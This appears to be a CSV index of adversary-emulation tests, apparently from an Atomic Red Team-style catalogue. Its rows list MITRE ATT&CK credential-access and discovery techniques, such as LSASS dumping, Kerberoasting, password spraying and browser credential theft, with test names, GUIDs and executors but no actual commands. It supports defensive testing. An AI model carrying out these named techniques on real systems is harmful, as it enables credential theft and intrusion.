credential-access,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
credential-access,T1040,Network Sniffing,9,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
credential-access,T1040,Network Sniffing,10,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
credential-access,T1040,Network Sniffing,11,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
credential-access,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,3,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,8c385f88-4d47-4c9a-814d-93d9deec8c71,powershell
credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
credential-access,T1555,Credentials from Password Stores,4,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials],36753ded-e5c4-4eb5-bc3c-e8fba236878d,powershell
credential-access,T1555,Credentials from Password Stores,5,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials],bc071188-459f-44d5-901a-f8f2625b2d2e,powershell
credential-access,T1555,Credentials from Password Stores,6,WinPwn - Loot local Credentials - lazagne,079ee2e9-6f16-47ca-a635-14efcd994118,powershell
credential-access,T1555,Credentials from Password Stores,7,WinPwn - Loot local Credentials - Wifi Credentials,afe369c2-b42e-447f-98a3-fb1f4e2b8552,powershell
credential-access,T1555,Credentials from Password Stores,8,WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords,db965264-3117-4bad-b7b7-2523b7856b92,powershell
credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,5,Simulating access to Opera Login Data,28498c17-57e4-495a-b0be-cc1e36de408b,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,7,Simulating access to Windows Edge Login Data,a6a5ec26-a2d1-4109-9d35-58b867689329,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,8,Decrypt Mozilla Passwords with Firepwd.py,dc9cd677-c70f-4df5-bd1c-f114af3c2381,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,10,Stage Popular Credential Files for Exfiltration,f543635c-1705-42c3-b180-efd6dc6e7ee7,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,11,WinPwn - BrowserPwn,764ea176-fb71-494c-90ea-72e9d85dce76,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,12,WinPwn - Loot local Credentials - mimi-kittenz,ec1d0b37-f659-4186-869f-31a554891611,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,13,WinPwn - PowerSharpPack - Sharpweb for Browser Credentials,e5e3d639-6ea8-4408-9ecd-d5a286268ca0,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,15,WebBrowserPassView - Credentials from Browser,e359627f-2d90-4320-ba5e-b0f878155bbe,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,16,BrowserStealer (Chrome / Firefox / Microsoft Edge),6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,8,CertUtil ExportPFX,336b25bf-4514-4684-8924-474974f28137,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,9,Export Root Certificate with Export-PFXCertificate,7617f689-bbd8-44bc-adcd-6f8968897848,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,10,Export Root Certificate with Export-Certificate,78b274f8-acb0-428b-b1f7-7b0d0e73330a,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,11,Export Certificates with Mimikatz,290df60e-4b5d-4a5e-b0c7-dc5348ea0c86,command_prompt
credential-access,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,3,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,4,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,11,Dump LSASS with createdump.exe from .Net v5,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1110.003,Brute Force: Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
credential-access,T1110.003,Brute Force: Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
credential-access,T1110.003,Brute Force: Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
credential-access,T1110.003,Brute Force: Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,5,WinPwn - DomainPasswordSpray Attacks,5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82,powershell
credential-access,T1110.003,Brute Force: Password Spraying,6,Password Spray Invoke-DomainPasswordSpray Light,b15bc9a5-a4f3-4879-9304-ea0011ace63a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,7,Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365),f3a10056-0160-4785-8744-d9bd7c12dc39,powershell
credential-access,T1110.003,Brute Force: Password Spraying,8,Password Spray using Kerbrute Tool,c6f25ec3-6475-47a9-b75d-09ac593c5ecb,powershell
credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
credential-access,T1003.005,OS Credential Dumping: Cached Domain Credentials,1,Cached Credential Dump via Cmdkey,56506854-89d6-46a3-9804-b7fde90791f9,command_prompt
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
credential-access,T1649,Steal or Forge Authentication Certificates,1,Staging Local Certificates via Export-Certificate,eb121494-82d1-4148-9e2b-e624e03fbf3d,powershell
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,4,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,7,WinPwn - sensitivefiles,114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,8,WinPwn - Snaffler,fdd0c913-714b-4c13-b40f-1824d6c015f2,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn - powershellsensitive,75f66e03-37d3-4704-9520-3210efbe33ce,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,12,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
credential-access,T1528,Steal Application Access Token,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
credential-access,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
credential-access,T1110.004,Brute Force: Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,3,Brute Force:Credential Stuffing using Kerbrute Tool,4852c630-87a9-409b-bb5e-5dc12c9ebcde,powershell
credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
credential-access,T1187,Forced Authentication,2,WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS,7f06b25c-799e-40f1-89db-999c9cc84317,powershell
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,3,"Access /etc/{shadow,passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,bash
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,4,"Access /etc/{shadow,passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,bash
credential-access,T1558.002,Steal or Forge Kerberos Tickets: Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,5,Create Volume Shadow Copy remotely with WMI,d893459f-71f0-484d-9808-ec83b2b64226,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,4,Request A Single Ticket via PowerShell,988539bc-2ed7-4e62-aec6-7c5cf6680863,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,5,Request All Tickets via PowerShell,902f4ed2-1aba-4133-90f2-cff6d299d6da,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,6,WinPwn - Kerberoasting,78d10e20-c874-45f2-a9df-6fea0120ec27,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,7,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,29094950-2c96-4cbd-b5e4-f7c65079678f,powershell
credential-access,T1003.006,OS Credential Dumping: DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
credential-access,T1003.006,OS Credential Dumping: DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
credential-access,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
credential-access,T1552.007,Kubernetes List Secrets,3,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
discovery,T1033,System Owner/User Discovery,6,System Discovery - SocGholish whoami,3d257a03-eb80-41c5-b744-bb37ac7f65c7,powershell
discovery,T1613,Container and Resource Discovery,1,Container and ResourceDiscovery,8a895923-f99f-4668-acf2-6cc59a44f05e,sh
discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
discovery,T1615,Group Policy Discovery,4,WinPwn - GPORemoteAccessPolicy,7230d01a-0a72-4bd5-9d7f-c6d472bc6a59,powershell
discovery,T1615,Group Policy Discovery,5,MSFT Get-GPO Cmdlet,52778a8f-a10b-41a4-9eae-52ddb74072bf,powershell
discovery,T1087.002,Account Discovery: Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5ad7-444a-bd11-8bf3136c477e,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
discovery,T1087.002,Account Discovery: Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,4,Automated AD Recon (ADRecon),95018438-454a-468c-a0fa-59c800149b59,powershell
discovery,T1087.002,Account Discovery: Domain Account,5,Adfind -Listing password policy,736b4f53-f400-4c22-855d-1a6b5a551600,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,6,Adfind - Enumerate Active Directory Admins,b95fd967-4e62-4109-b48d-265edfd28c3a,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1087.002,Account Discovery: Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
discovery,T1087.002,Account Discovery: Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
discovery,T1087.002,Account Discovery: Domain Account,13,Enumerate Linked Policies In ADSISearcher Discovery,7ab0205a-34e4-4a44-9b04-e1541d1a57be,powershell
discovery,T1087.002,Account Discovery: Domain Account,14,Enumerate Root Domain linked policies Discovery,00c652e2-0750-4ca6-82ff-0204684a6fe4,powershell
discovery,T1087.002,Account Discovery: Domain Account,15,WinPwn - generaldomaininfo,ce483c35-c74b-45a7-a670-631d1e69db3d,powershell
discovery,T1087.002,Account Discovery: Domain Account,16,Kerbrute - userenum,f450461c-18d1-4452-9f0d-2c42c3f08624,powershell
discovery,T1087.002,Account Discovery: Domain Account,17,Wevtutil - Discover NTLM Users Remote,b8a563d4-a836-4993-a74e-0a19b8481bfe,powershell
discovery,T1087.002,Account Discovery: Domain Account,18,Suspicious LAPS Attributes Query with Get-ADComputer all properties,394012d9-2164-4d4f-b9e5-acf30ba933fe,powershell
discovery,T1087.002,Account Discovery: Domain Account,19,Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property,6e85bdf9-7bc4-4259-ac0f-f0cb39964443,powershell
discovery,T1087.002,Account Discovery: Domain Account,20,Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope,ffbcfd62-15d6-4989-a21a-80bfc8e58bb5,powershell
discovery,T1087.002,Account Discovery: Domain Account,21,Suspicious LAPS Attributes Query with adfind all properties,abf00f6c-9983-4d9a-afbc-6b1c6c6448e1,powershell
discovery,T1087.002,Account Discovery: Domain Account,22,Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd,51a98f96-0269-4e09-a10f-e307779a8b05,powershell
discovery,T1087.001,Account Discovery: Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,4,Find machines where user has local admin access (PowerView),a2d71eee-a353-4232-9f86-54f4288dd8c1,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,5,Find local admins on all machines in domain (PowerView),a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,14,Active Directory Enumeration with LDIFDE,22cf8cb9-adb1-4e8c-80ca-7c723dfc8784,command_prompt
discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
